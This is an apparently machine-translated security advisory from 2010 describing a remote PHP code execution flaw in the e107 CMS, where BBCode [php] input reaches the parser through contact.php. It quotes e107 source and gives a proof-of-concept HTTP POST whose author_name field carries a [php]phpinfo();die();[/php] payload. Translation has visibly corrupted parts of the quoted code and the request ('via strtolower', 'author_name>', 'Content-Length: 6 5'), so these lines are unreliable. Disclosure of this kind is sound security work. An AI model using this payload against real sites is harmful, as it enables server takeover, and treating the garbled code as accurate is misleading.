e107 BBCode arbitrary PHP code execution vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201026996
Type myhack58
Reporter 佚名
Modified 2010-05-22T00:00:00


e107 is a php written content management system.

e107 in the bbcode [php]allows execution of arbitrary PHP code. Since this method is more dangerous, e107 configuration generally prohibit all users access the bbcode, the administrator can be for a specific group of users on-demand activation of this feature.

e107 access control checks are not in the bbcode parser internal but in some calls the bbcode parser of the external function to achieve, for example:

function post_toHTML($text, $modifier = true, $extra = ") { ...

//If user is not allowed to use [php] change to entities if(! check_class($pref['php_bbcode'])) { $text = preg_replace("#\[(php)#i", "[\\1", $text); }

return ($modifier ? $this->toHTML($text, true, $extra) : $text); }

This code shows toHTML()methods, not the[php]access check is performed, because it has been executed in the external examined. This means that user input should not directly reach the toHTML()methods, otherwise it may lead to execution of remote PHP code.

But in some other places where user input can reach the toHTML (), as in the toEmail()way:

function toEmail($text,$posted="",$mods="parse_sc, no_make_clickable") { if ($posted === TRUE && MAGIC_QUOTES_GPC) { $text = stripslashes($text); }

$text = (via strtolower($mods) != "rawtext") ? $this->replaceConstants($text,"full") : $text; $text = $this->toHTML($text,TRUE,$mods); return $text; }

If toEmail()mode using the user input, it could lead to execution of remote PHP code. This is the case is an example of a contact. php file:


$error = "";

$sender_name = $tp->toEmail($_POST['author_name>'], TRUE,"rawtext"); $sender = check_email($_POST['email_send']); $subject = $tp->toEmail($_POST['subject'],TRUE,"rawtext"); $body = $tp->toEmail($_POST['body'],TRUE,"rawtext");

To contact. php file to submit the POST request will cause the server to execute arbitrary PHP code.

Test code:

POST /contact.php HTTP/1.1 Host: xxxx User-Agent: e107 0.7.20 Remote Code Execution Exploit Content-Type: application/x-www-form-urlencoded Content-Length: 6 5

send-contactus=1&author_name > =[php]phpinfo()%3bdie()%3b[/php]&

The current vendor has not provided the patch or upgrade process, we recommend the use of this software users follow the manufacturer's home page to get the latest version: